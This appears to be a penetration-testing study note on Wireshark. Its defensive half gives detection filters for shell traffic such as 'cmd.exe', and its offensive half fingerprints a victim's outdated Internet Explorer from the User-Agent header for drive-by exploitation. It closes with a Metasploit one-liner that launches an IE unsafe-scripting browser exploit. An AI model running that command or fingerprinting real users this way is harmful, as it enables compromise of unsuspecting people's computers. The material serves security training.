Weaponizing Wireshark

Wireshark – Defensive Perspective

Wireshark is a powerful network analysis tool that defenders can use to capture and inspect traffic generated by offensive tools such as Nmap and Socat. It allows visibility into network-level activities that may indicate reconnaissance or exploitation attempts.

Common Uses in Defense:

• Detecting scanning activity (e.g., unusual port probes from Nmap).

• Identifying unencrypted command execution (e.g., reverse shells via Socat).

• Monitoring unauthorized use of commonly trusted ports (e.g., cleartext data on port 22 or 443).

Example filters for analysis:

tcp.port == 22 && tcp.len > 0
tcp contains "cmd.exe"

---

Wireshark – Offensive Perspective

While typically used for defense, Wireshark also has value in offensive security operations, particularly during client-side attacks.

Use Case: Fingerprinting the Victim's Environment

When an attacker entices a user to visit a malicious webpage, the attacker's system can capture and analyze HTTP headers, including the User-Agent string, to determine the browser and system configuration.

Captured example:

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; 
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729)

Analysis:

• MSIE 7.0 indicates Internet Explorer 7, an outdated browser with known vulnerabilities.

• .NET CLR versions suggest older runtime environments.

• This information can be used to assess exploitability for attacks such as drive-by downloads or legacy browser exploits.

---

Summary

Perspective	Objective	Wireshark Application
Defensive	Detect and analyze malicious network activity	Monitor traffic from tools like Nmap and Socat
Offensive	Gather client system/browser information	Inspect User-Agent strings to identify outdated software

msfconsole -x "use /exploit/windows/browser/ie unsafe_scripting; set ALLOWPROMPT true; set URIPATH /evil; info; run"